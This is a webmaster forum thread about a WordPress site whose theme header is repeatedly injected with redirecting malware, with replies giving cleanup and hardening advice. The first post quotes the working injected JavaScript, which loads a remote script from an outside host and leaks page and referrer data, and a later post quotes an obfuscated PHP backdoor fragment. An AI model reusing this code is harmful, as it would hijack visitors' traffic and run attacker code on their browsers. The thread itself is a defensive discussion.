#1 |
Confirmed User
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
|
Scripts inserted in my WP themes header
Somehow some scripts are placed in my theme header that contain malware and redirect traffic to other sites.
I changed themes 3 times, got hosting to scan for the malware, which they did and deleted it, but it happens every day. It points to different sites. Some were adult dating sites. Below is a sample. How can I get rid of these things? It has cost me money to fix some stuff and I also lost over half of my traffic.
<script>var a='';setTimeout(1);function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<c.length;d++){for(var e=c[d];" "==e.charAt(0);)e=e.substring(1);if(0==e.indexOf(b))return e.substring(b.length,e.length)}return null}null==getCookie("__cfgoid")&&(setCookie("__cfgoid",1,1),1==getCookie("__cfgoid")&&(setCookie("__cfgoid",2,1),document.write('<script type="text/javascript" src="' + 'http://bekcelerotomotiv.com/js/jquery.min.php' + '?key=b64' + '&utm_campaign=' + 'G91825' + '&utm_source=' + window.location.host + '&utm_medium=' + '&utm_content=' + window.location + '&utm_term=' + encodeURIComponent(((k=(function(){var keywords = '';var metas = document.getElementsByTagName('meta');if (metas) {for (var x=0,y=metas.length; x<y; x++) {if (metas[x].name.toLowerCase() == "keywords") {keywords += metas[x].content;}}}return keywords !== '' ? keywords : null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k)) + '&se_referrer=' + encodeURIComponent(document.referrer) + '"><' + '/script>')));</script>
#2 | |
#Alberta51
Industry Role:
Join Date: Oct 2014
Location: USA Territory (Alberta)
Posts: 7,887
|
Quote:
Without accusing any company, you should look into this too.
__________________
Tube - Cam - Escorts - Top List Menu Tab - Banner - Header Link - Blog Post DM me
#3 |
Confirmed User
Industry Role:
Join Date: Feb 2005
Posts: 1,699
|
I would suggest:
Check out these links on making Wordpress more secure:
https://codex.wordpress.org/Hardening_WordPress
Securing WordPress: Hardening Basics | The State of Security
https://www.wordfence.com/learn/how-...rdpress-sites/
#4 |
Confirmed User
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
|
Thanks. Everything started when I used an ad network's script months ago, then stopped, then cleaned the whole site, but it has been returning many many times.
All plugins are from the WP repository. The problem is that the issue happens every day or every two days, so running without a plugin per day as a test may end like next year and still it may harm the website. The 3 admins are me and the developers I had to hire to fix the issue. No one else has logged in to the site as admin in the past weeks. Is there a way to block scripts?
#5 |
#Alberta51
Industry Role:
Join Date: Oct 2014
Location: USA Territory (Alberta)
Posts: 7,887
|
Can you check your Jetpack stats and tell me if you see outbound clicks going to a URL like this: 01.wp.com etc... if anything looks similar?
Many think those are legit outbound but THEY ARE NOT. Also check the webmaster tools USER owner property, if anyone new has been added as owner. Been hacked this way before.
#6 | |
Confirmed User
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
|
Quote:
|
|
#7 |
(>^_^)b
Industry Role:
Join Date: Dec 2011
Posts: 7,223
|
Find out what program and with what refID they're sending traffic to, then report them to that program so that they get canned and not paid..
__________________
I've referred over $1.7mil in spending this past year, you should join in. I make a lot more money in the medical field in a lab now, fuck you guys. Don't ask me to come back, but do join Chaturbate in my sig, it still makes bank without me touching shit for years..
#8 |
Confirmed User
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
|
I will do that, but still that may not stop them from doing it, as they might just go to other affiliates. Is there a way to block a specific script, regardless of the URL?
|
#9 | |
#Alberta51
Industry Role:
Join Date: Oct 2014
Location: USA Territory (Alberta)
Posts: 7,887
|
Quote:
At this point if your tech can't fix it try another one mate. Or worst case change Theme. Good Luck and keep us posted
#10 | |
(>^_^)b
Industry Role:
Join Date: Dec 2011
Posts: 7,223
|
Quote:
Try removing the script, then change your cPanel and WP passwords, "harden" WP if you know how, remove plugins and themes that you don't use anymore, make sure file permissions are set right, see if there are any weird fake files added like jquery.min.php or .ftpquote, check uploads folder for things that don't belong, and sometimes people with this issue have resolved it with something called Sucuri. Hope this helps.
#11 |
#Alberta51
Industry Role:
Join Date: Oct 2014
Location: USA Territory (Alberta)
Posts: 7,887
|
#12 |
(>^_^)b
Industry Role:
Join Date: Dec 2011
Posts: 7,223
|
I removed it, but that was just sucuri.net showing the malware in plain text.
#13 |
Confirmed User
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
|
ok thanks.. will let you know if something of this works out
|
#14 |
Webmaster
Industry Role:
Join Date: Jun 2004
Posts: 14,294
|
We used to have exactly the same thing. Even managed to track the fucking Russian down to his home address.
We tried EVERYTHING to get rid of it. And the only thing that worked was a complete server wipe. They inject their code through some shitty wp plugin, and then the virus spreads everywhere on your system. Even limiting server access by IP firewall didn't help. Had to wipe/format the server. |
#15 | |
Confirmed User
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
|
Quote:
|
|
#16 |
Confirmed User
Join Date: Nov 2001
Location: Redmond, WA
Posts: 2,727
|
If you have downloaded a theme and it has encrypted ANYTHING on it, that is probably the source of the problem.
|
#17 |
So Fucking Banned
Join Date: Aug 2002
Posts: 10,300
|
That's what you get not keeping software up to date, op.
|
#18 |
Affiliate
Industry Role:
Join Date: Feb 2008
Posts: 241
|
You probably already have tried some malware plugins - but if you haven't tried this one I would give it a go: https://wordpress.org/plugins/gotmls/
__________________
Porn Affiliate Programs - The Best Affiliate Programs & Some Webmaster Resources Like Free WP Themes. |
#19 |
Confirmed User
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
|
Thanks guys and thanks for the recommendations.
As I am not tech savvy and the person helping me is MIA, I tried to find the issue myself. What is the dirs.php file supposed to do? I think that is one of the issues. It has crap like this one:
${S8TWxbKKKF("8Cw8}y27>v#")} = ${VpyOMClU(";ZC0b:wf~")}(Array(S8TWxbKKKF("2?@=") => Array(RoPOn5JDKcTm("70@5=3") => XcNWgTqO("xx}!"), HQZTMCcx4OL("20-13A") => S8TWxbKKKF("k::A3=D\\FLD:bI-=>;943G=D8XDXEFG\\8BFBU@>93=3@688"), S8TWxbKKKF("-::A3=D") => $content)));
#20 |
Confirmed User
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
|
What does it mean when Wordfence tells you that somebody came to your site and tried to access a non-existent page? The non-existent pages are not real pages...
http://www.boobsrealm.com/wp-content.../wordfence.png |
#21 | |
Confirmed User
Industry Role:
Join Date: Feb 2005
Posts: 1,699
|
Quote:
If you found that file on the root directory of your Wordpress install, and you're sure that all your plugins are safe, then it is highly likely access to your server has been compromised. I would suggest trying this, in this order:
If the script issue persists after all that, then your problem is as serious as Google Expert's because infected files are hidden somewhere else in your server. |
|
#22 | |
(>^_^)b
Industry Role:
Join Date: Dec 2011
Posts: 7,223
|
Quote:
There are others, too, like if you see a bunch of random.com/something/feed showing up then that's a bot looking for content to scrape.
#23 | |
Confirmed User
Industry Role:
Join Date: Jul 2012
Posts: 3,064
|
Quote:
I would search "fonts/fontawesome-webfont.woff2 found" or "themes/redwave-lite/fonts/fontawesome-webfont.woff?version=4.3.0" If you want to fix this error. You may want to look for your hack though. Are you on shared hosting? Can you find when your file is getting changed? Maybe check the site log for when the hacked file is getting updated. Did you change your ftp password like Fetish Gimp mentioned? Did you change your wordpress password? I like to rename wp-login.php to something else and change it back only when I need to make an update. I don't think this will help you, but may be worth a try.
__________________
Live Sex Shows |
|
#24 |
So Fucking Banned
Industry Role:
Join Date: Feb 2001
Location: Taipei
Posts: 25,198
|
ravenazrael, you are in for a big surprise. This shit has been hitting my sites for months, it's no easy cleanup. Sometimes they can make your sites appear to be normal while stealing all your Google traffic too.
https://aw-snap.info/file-viewer/ I found this online website scanning tool very helpful This is a terrible, terrible thing
#25 |
Confirmed User
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
|
Thanks to everybody!
Yes it has been hitting me for months and it looked normal for a while. my traffic has gone to 1/3 now |
#26 |
So fuckin' bored
Industry Role:
Join Date: Jun 2003
Posts: 32,381
|
According to the reports I read, over 90% of all "nulled" plugins and themes that float on the pirate sites and torrents have a backdoor.
__________________
Obey the Cowgod |
#27 |
Confirmed User
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
|
All plugins were downloaded from the WP repository... files were cleared... but the script returned again =(
|
#28 | |
#Alberta51
Industry Role:
Join Date: Oct 2014
Location: USA Territory (Alberta)
Posts: 7,887
|
Quote:
I have my part of the problem also, moving server is a Bitch.... Hitting my head on my desk for the last 72 hours. At least you know where the problem comes from, I suggest you TAKE Big action to wipe it out.
#29 | |
Confirmed User
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
|
Quote:
|
|
#30 |
Confirmed User
Industry Role:
Join Date: Feb 2005
Posts: 1,699
|
I believe what he means is that you back up your database and image/video files, and wipe the server clean. Change all passwords, and reinstall your backed up files.
One thing you might wanna do is to search your Wordpress database(s) for any scripts that might have been injected into it. Search for any <script> tags and strings from the script that keeps getting injected, just in case they've been saved into the database so that whenever Wordpress runs, they get put back in.
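The database search suggested in this post, as an added example that is not part of the original thread: it scans a SQL dump of the WordPress database for `<script>` tags loaded from foreign hosts and for strings from the snippet in post #1. The function name, the dump format (one `INSERT INTO` statement per line) and the sample host names are assumptions.

```python
import re
from urllib.parse import urlparse

# Table name of each INSERT statement in the dump.
INSERT_RE = re.compile(r"^INSERT INTO `?(\w+)`?", re.I)
# src attribute of a <script> tag; dumps escape quotes as \" or \'.
SRC_RE = re.compile(r"<script\b[^>]*?\bsrc\s*=\s*\\?[\"']?([^\"'\\\s>]+)", re.I)
# Strings taken from the injected snippet quoted in post #1.
MARKERS = ("__cfgoid", "jquery.min.php")


def scan_dump(sql_text, own_hosts):
    """Return (line_no, table, finding) tuples for suspicious INSERT lines.

    own_hosts: host names the site legitimately loads scripts from.
    Dumps often pack many rows into one INSERT line, so a finding
    points at the statement, not at a single row.
    """
    own = {h.lower() for h in own_hosts}
    findings = []
    for lineno, line in enumerate(sql_text.splitlines(), 1):
        m = INSERT_RE.match(line)
        if not m:
            continue
        table = m.group(1)
        for src in SRC_RE.findall(line):
            try:
                host = (urlparse(src).hostname or "").lower()
            except ValueError:
                host = ""  # malformed URL, nothing to compare
            if host and host not in own:
                findings.append((lineno, table, "external-script:" + host))
        for marker in MARKERS:
            if marker in line:
                findings.append((lineno, table, "marker:" + marker))
    return findings
```

Relative script paths are ignored because they resolve to the site itself; every host reported still needs a manual check against the ad and analytics services the site really uses.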
#31 | |
Confirmed User
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
|
Quote:
|
|
#32 |
Confirmed User
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
|
seems it is finally solved. thanks to you all!
|
#33 |
So Fucking Banned
Industry Role:
Join Date: Feb 2001
Location: Taipei
Posts: 25,198
|
oh it's never solved
#34 |
So Fucking Banned
Industry Role:
Join Date: Apr 2003
Location: online
Posts: 8,766
|
|
#35 |
Confirmed User
Industry Role:
Join Date: Oct 2003
Location: L.A.
Posts: 5,744
|
They likely made many backdoor shells. Best bet is to format, then import only posts from the old database on a fresh install.
__________________
* Handwritten * 180 C Class IPs * Permanent! * Many Niches! * Bulk Discounts! GFYPosts /at/ J2Media.net
#36 |
Registered User
Industry Role:
Join Date: Oct 2014
Posts: 9
|
Back up only post content and images. Nothing else. Then do a clean install. Most likely you got that code when you 'tried' one of those nulled plugins from blackhat forums or let one of those bargain freelancers work on your site.
|
#37 |
VIP
Industry Role:
Join Date: Jul 2013
Posts: 22,111
|
I am also curious after reading all of this.
|
#38 |
Webmaster
Industry Role:
Join Date: Jun 2004
Posts: 14,294
|
|
#39 |
Confirmed User
Industry Role:
Join Date: Jun 2012
Posts: 457
|
This isn't true. You can update plugins and themes, run malware scanners and update all your passwords, then install a Better Security plugin. It's a pain but much quicker than a format and clean install.
|
#40 | |
Confirmed User
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
|
Quote:
I actually never downloaded any plugin or script from BHW. I remember it all started when I inserted a script from a well-known ad network. Not sure if it triggered it or was a coincidence.
|
#41 |
Confirmed Chicago Pimp
Industry Role:
Join Date: Aug 2004
Location: Chicago
Posts: 7,100
|
Basics....
https://ithemes.com/2016/10/13/how-t...ly-and-easily/
Good plugin...
https://wordpress.org/plugins/all-in...-and-firewall/
If that doesn't do it, you could route DNS through Incapsula to kill off some bad shit before it even gets to your server. CloudFlare is more popular and a good CDN, but in terms of security Incapsula's free plan blocks more bad shit out than CloudFlare's paid plan.
#42 |
Richest man in Babylon
Industry Role:
Join Date: Jan 2002
Location: Posts: 10,002
Posts: 5,687
|
It is possible to clean out a hacked Wordpress setup and indeed I have done it.
One thing that may help you is this:
find /pathtoyourfiles/yourblog.com -mtime -2 -ls
It will list all of the files that have been modified in the past two days, which is very helpful in catching backdoor shell scripts and files being placed on your server. If the attacker is using your site to send spam emails, it's easy to find the originating script from the email header. Then you can delete it and also search in your logs for other scripts being used to send email. Usually the attacker will have three systems going: one is the actual backdoor that allows him to place files on your server, the other is the scripts that they use to send spam emails, and the other is a page on your website that acts as an endpoint for the URLs in his spam emails. This is the classic attack these days, and once you can wrap your head around what they are trying to do it's a lot easier to prevent it. It can also help if you use something like Wordfence, which will catch some but not all of the problems. Also keep your plugins up to date and delete any old plugins and themes.
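An added example, not part of the original post, that extends the `find -mtime -2` check above with the other file checks mentioned in this thread: the fake file names from posts #10 and #19, PHP files in the uploads folder, and strings from the snippet in post #1. The function name, the extension list and the size limit are assumptions.

```python
import os
import sys
import time

# File names and strings quoted in this thread (posts #1, #10 and #19).
SUSPECT_NAMES = {"jquery.min.php", ".ftpquote", "dirs.php"}
CONTENT_MARKERS = (b"__cfgoid", b"jquery.min.php")
PHP_EXT = (".php", ".phtml", ".php5")   # assumption: extensions the server executes
MAX_BYTES = 2 * 1024 * 1024             # read at most 2 MiB per file


def triage(root, days=2, now=None):
    """Return {relative_path: [reasons]} for files that deserve a manual look."""
    cutoff = (time.time() if now is None else now) - days * 86400
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                mtime = os.stat(path).st_mtime
                with open(path, "rb") as fh:
                    data = fh.read(MAX_BYTES)
            except OSError:
                continue  # unreadable file or dangling symlink
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            reasons = []
            if mtime >= cutoff:                      # same idea as: find -mtime -2
                reasons.append("modified-recently")
            if name.lower() in SUSPECT_NAMES:
                reasons.append("suspect-name")
            if "/uploads/" in "/" + rel and name.lower().endswith(PHP_EXT):
                reasons.append("php-in-uploads")
            hits = [m.decode() for m in CONTENT_MARKERS if m in data]
            if hits:
                reasons.append("marker:" + ",".join(hits))
            if reasons:
                findings[rel] = reasons
    return findings


if __name__ == "__main__":
    # usage: python triage.py /pathtoyourfiles/yourblog.com [days]
    days = int(sys.argv[2]) if len(sys.argv) > 2 else 2
    for rel, reasons in sorted(triage(sys.argv[1], days).items()):
        print(rel, "; ".join(reasons))
```

Modification times can be reset by whoever placed a file, so the name and content checks run on every file regardless of its age.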
#43 |
Confirmed User
Industry Role:
Join Date: Nov 2011
Location: montreal
Posts: 588
|
thank you! I hope all this also helps somebody else who may have similar issues in the future
|
#44 | |
Webmaster
Industry Role:
Join Date: Jun 2004
Posts: 14,294
|
Quote:
We had spent 6 months trying to clean it out from our server. It would always come back. In the end we had to format the HD and reinstall the OS. P.S. they also try to hide their presence by redirecting certain countries only. So you may be viewing the site and thinking that all is good, while people from other countries are being redirected to his doorway pages.
|